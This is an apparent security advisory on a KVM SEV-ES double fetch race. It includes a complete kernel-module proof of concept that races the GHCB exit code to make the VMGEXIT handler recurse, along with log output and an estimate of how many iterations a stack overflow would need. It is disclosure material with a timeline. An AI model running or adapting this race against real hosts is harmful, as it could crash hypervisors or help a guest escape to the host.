Linux: KVM SEV-ES double fetch vulnerability

Summary

A KVM guest using SEV-ES or SEV-SNP with multiple vCPUs can trigger a double fetch race condition vulnerability and invoke the VMGEXIT handler recursively. If an attacker manages to call the handler multiple times, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape in kernel configurations without stack guard pages (CONFIG_VMAP_STACK).

Severity

Moderate - could lead to a stack overflow and cause a denial-of-service or potentially guest-to-host escape.

Proof of Concept

The proof of concept enters the VMGEXIT handler with SVM_EXIT_VMGEXIT as exit-code, and then quickly swaps to SVM_EXIT_INVD to pass the validation. This results in a recursive invocation of svm_invoke_exit_handler with SVM_EXIT_VMGEXIT as exit_code.

#include <linux/delay.h>
#include <linux/kthread.h>
#include <linux/module.h>
#include <asm/msr-index.h>
#include <asm/sev.h>
#include <asm/svm.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Andy Nguyen");
MODULE_DESCRIPTION("KVM SEV-ES VMGEXIT double fetch race condition");
MODULE_VERSION("1.0");

static inline u64 sev_es_rd_ghcb_msr(void) {
  return __rdmsr(MSR_AMD64_SEV_ES_GHCB);
}

static __always_inline void vc_ghcb_invalidate(struct ghcb *ghcb) {
  ghcb->save.sw_exit_code = 0;
  __builtin_memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
}

static int race1_thread(void *ghcb) {
  u64 ghcb_pa;

  ghcb_pa = __pa(ghcb);
  printk(KERN_EMERG "thread 1: ghcb: %p, ghcb_pa: %llx\n", ghcb, ghcb_pa);

  while (1) {
    *(volatile u64 *)(ghcb + 0x390) = SVM_EXIT_VMGEXIT;
    *(volatile u64 *)(ghcb + 0x390) = SVM_EXIT_INVD;
    asm("pause\n");
  }

  return 0;
}

static int race0_thread(void *arg) {
  struct task_struct *race1_task;
  void *ghcb;
  u64 ghcb_pa;

  ghcb_pa = sev_es_rd_ghcb_msr();
  ghcb = __va(ghcb_pa);
  printk(KERN_EMERG "thread 0: ghcb: %p, ghcb_pa: %llx\n", ghcb, ghcb_pa);

  race1_task = kthread_create(race1_thread, ghcb, "race1");
  kthread_bind(race1_task, 1);
  wake_up_process(race1_task);

  while (1) {
    vc_ghcb_invalidate(ghcb);
    ghcb_set_sw_exit_code(ghcb, SVM_EXIT_VMGEXIT);
    ghcb_set_sw_exit_info_1(ghcb, 0);
    ghcb_set_sw_exit_info_2(ghcb, 0);
    VMGEXIT();
    asm("pause\n");
  }

  return 0;
}

static int __init poc_init(void) {
  struct task_struct *race0_task;

  race0_task = kthread_create(race0_thread, NULL, "race0");
  kthread_bind(race0_task, 0);
  wake_up_process(race0_task);

  return 0;
}

static void __exit poc_exit(void) {}

module_init(poc_init);
module_exit(poc_exit);

We modified the function sev_handle_vmgexit and added the following print to alert when the race condition was successful:

default:
                if (exit_code == SVM_EXIT_VMGEXIT)
                        pr_err("Race condition triggered!\n");
                ret = svm_invoke_exit_handler(svm, exit_code);

Running this will result in something like the below:

[ 3332.177310] SVM: kvm [107255]: vcpu0, guest rIP: 0x0 vmgexit: exit code 0x403 is not valid
[ 3332.307315] SVM: Race condition triggered!
[ 3332.311419] SVM: kvm [107255]: vcpu0, guest rIP: 0x0 vmgexit: exit code 0x76 input is not valid

Further Analysis

If an attacker is able to trigger the recursion multiple times reliably on the same call stack, they can theoretically trigger a stack overflow and cause a denial-of-service or potentially guest-to-host escape. Exploiting recursions on linux kernel has been proven feasible in 2016. However, today, there are mitigations such as CONFIG_VMAP_STACK that add guard pages to stacks.

Moreover, winning the race reliably in every iteration is very tricky due to the very tight window of the fetches; namely they are consecutive (because of optimization and inlining):

     // Corresponds to [2] from code above.
     d83:       49 8b 8e 90 03 00 00    mov    rcx,QWORD PTR [r14+0x390]
     // Corresponds to [3] from code above.
     d8a:       4d 8b bc 24 90 03 00    mov    r15,QWORD PTR [r12+0x390]

A kernel stack on x86-64 is 16384 bytes large. In our build, the function sev_handle_vmgexit allocates 64 bytes of stack and svm_invoke_exit_handler allocates 40 bytes of stack. Not taking into account the stack used until that point, we estimate that around ~100-150 successful races / iterations are needed to overflow.

For the currently work-in-progress KVM SEV-SNP code (not upstream yet), the code has been reorganized, and the race window might be a bit bigger and hence easier to win (see [5] and [6] from code above). Though, we have not yet compiled the code to confirm.

Timeline

Date reported: 05/08/2023
Date fixed: 08/04/2023
Date disclosed: 09/06/2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Linux: KVM SEV-ES double fetch vulnerability

Package

Affected versions

Patched versions

Description

Summary

Severity

Proof of Concept

Further Analysis

Timeline

Severity

CVE ID

Weaknesses

Credits